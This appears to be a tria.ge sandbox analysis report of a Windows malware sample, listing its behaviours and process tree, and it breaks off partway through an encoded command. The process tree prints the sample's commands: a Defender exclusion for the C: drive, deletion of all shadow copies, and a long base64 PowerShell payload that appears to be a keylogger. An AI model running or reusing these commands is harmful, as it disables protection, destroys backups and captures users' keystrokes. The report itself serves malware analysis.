Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
26/06/2024, 20:32
Static task
static1
Behavioral task
behavioral1
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win11-20240508-en
General
-
Target
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
-
Size
428KB
-
MD5
2a90a7ccf98e12ba57583e1e012eca18
-
SHA1
66512ffb8c58d1444622ff64f189cd7db7dbde1d
-
SHA256
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8
-
SHA512
b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5
-
SSDEEP
6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2828 3032 wscript.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 756 3032 powershell.exe 36 -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2664 powershell.exe 2524 powershell.exe 756 powershell.exe 2664 powershell.exe 2524 powershell.exe -
Deletes itself 1 IoCs
pid Process 2944 wscript.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Loads dropped DLL 1 IoCs
pid Process 2872 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2888 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\DynamicWrapperX\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\DynamicWrapperX regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" wscript.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT wscript.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2664 powershell.exe 2524 powershell.exe 756 powershell.exe 756 powershell.exe 756 powershell.exe 756 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2944 wscript.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2524 powershell.exe Token: SeBackupPrivilege 1992 vssvc.exe Token: SeRestorePrivilege 1992 vssvc.exe Token: SeAuditPrivilege 1992 vssvc.exe Token: SeDebugPrivilege 756 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 756 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1944 wrote to memory of 2736 1944 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 28 PID 1944 wrote to memory of 2736 1944 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 28 PID 1944 wrote to memory of 2736 1944 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 28 PID 1944 wrote to memory of 2736 1944 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 28 PID 2736 wrote to memory of 2664 2736 cmd.exe 30 PID 2736 wrote to memory of 2664 2736 cmd.exe 30 PID 2736 wrote to memory of 2664 2736 cmd.exe 30 PID 2736 wrote to memory of 2664 2736 cmd.exe 30 PID 2736 wrote to memory of 2944 2736 cmd.exe 31 PID 2736 wrote to memory of 2944 2736 cmd.exe 31 PID 2736 wrote to memory of 2944 2736 cmd.exe 31 PID 2736 wrote to memory of 2944 2736 cmd.exe 31 PID 2944 wrote to memory of 2524 2944 wscript.exe 34 PID 2944 wrote to memory of 2524 2944 wscript.exe 34 PID 2944 wrote to memory of 2524 2944 wscript.exe 34 PID 2944 wrote to memory of 2524 2944 wscript.exe 34 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2872 2944 wscript.exe 38 PID 2944 wrote to memory of 2888 2944 wscript.exe 39 PID 2944 wrote to memory of 2888 2944 wscript.exe 39 PID 2944 wrote to memory of 2888 2944 wscript.exe 39 PID 2944 wrote to memory of 2888 2944 wscript.exe 39 PID 756 wrote to memory of 1552 756 powershell.exe 44 PID 756 wrote to memory of 1552 756 powershell.exe 44 PID 756 wrote to memory of 1552 756 powershell.exe 44 PID 1552 wrote to memory of 2284 1552 csc.exe 45 PID 1552 wrote to memory of 2284 1552 csc.exe 45 PID 1552 wrote to memory of 2284 1552 csc.exe 45 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")2⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\wscript.exewscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"4⤵
- Loads dropped DLL
- Modifies registry class
PID:2872
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:2888
-
-
-
-
C:\Windows\SysWOW64\wscript.exeC:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\07cfaa2b0.js" 761⤵
- Process spawned unexpected child process
- Modifies registry class
PID:2828
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGgAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpADMAIABhADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAbwA2ACAAagA3ACAAPQAgAHAAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAawA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABsADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGkAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABrADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAG8AMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABqADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGIAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABsADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAG8AMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGQAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGsAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGwAMQAwACAAYwAzADUAKQB7AGcAMQAxACAAPQAgAGMAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGMAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AG8AMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGMAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAagAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGIAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAbAAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAaAAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGwAMgA0ACkAOwBpAGYAIAAoAGgAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABsADIANAApADsAZQAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAGUAMgA3ACkAIAAhAD0AIAAwACkAIABlADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBrADEAOAAgAD0AIAAiACIAOwBvADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAG8AMQAzACkAOwBmADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbwAxADMALAAgAGYAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAaQAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbwAxADMALAAgAHIAZQBmACAAaQAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGkAMQA0ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAagA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAawA5ACAAPQAgAGkAMwA5ACgAYQA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAawA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQAzADkAKABpADMAIABhADQAKQB7AEkAbgB0AFAAdAByACAAZAA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGEANAAsACAAZAA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAG4ANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYANAAyACwAIABzAHQAcgBpAG4AZwAgAGYANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAagA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABuADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBuADQANQBkAGEAdABhAF8AIAA9ACAAbgA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAZgA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGYANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAGoANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIABuADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGEANAA2ACgASQBuAHQAUAB0AHIAIABnADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABnADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABpADMAKABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABvADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABsADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGoANQAoAGkAbgB0ACAAbgA0ADgALAAgAEkAbgB0AFAAdAByACAAZgA0ADkALAAgAEkAbgB0AFAAdAByACAAbgA1ADAAKQB7AGkAZgAgACgAbgA0ADgAIAA+AD0AIAAwACAAJgAmACAAZgA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAZQA1ADEAIAA9ACAAYQA0ADYAKABuADUAMAApADsAaQBmACAAKABlADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGsAOQAsACAAbgA0ADgALAAgAGYANAA5ACwAIABuADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAGEANQAyACAAPQAgACgAZQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAZAA1ADMAIAA9ACAAKABlADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGcANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGcANQA1ACkAKQB7AHUAaQBuAHQAIABqADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAZQA1ADEALAAgADMAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGUANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAaQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABsADEAMgAsACAAcgBlAGYAIABlADUANwApADsAdQBpAG4AdAAgAGgANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGkANQA4ACkAOwBpAGYAIAAoAGEANQAyACAAfAB8ACAAZAA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGUANQAxACwAIABqADUANgAsACAAZwA1ADUALAAgAGoANQA0ACwAIABqADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAaAA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbAAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAZQA1ADcAIAAhAD0AIABpADEANAApACAAfAB8ACAAKABsADEAMgAgACEAPQAgAG8AMQAzACkAIAB8AHwAIAAoAGYAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBuADQAMQAoAGYAMQA2ACwAIABhADIANQAsACAAZQAxADcAKQA7AGYAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANgAuAEwAZQBuAGcAdABoACkAOwBmADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGUAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABlADEANwAuAEwAZQBuAGcAdABoACkAOwBvADEAMwAgAD0AIABsADEAMgA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGUANQA3ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBpADEANAAgAD0AIABlADUANwA7AH0AaQBmACAAKABlADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAGEANQAyACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABkADUAMwApACAAZQAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABlADEANwAuAEEAcABwAGUAbgBkACgAagA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABrADkALAAgAG4ANAA4ACwAIABmADQAOQAsACAAbgA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABqADYAMAAoAGIAeQB0AGUAWwBdACAAagA2ADEAKQB7AHMAdAByAGkAbgBnACAAbwA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABqADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABvADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3A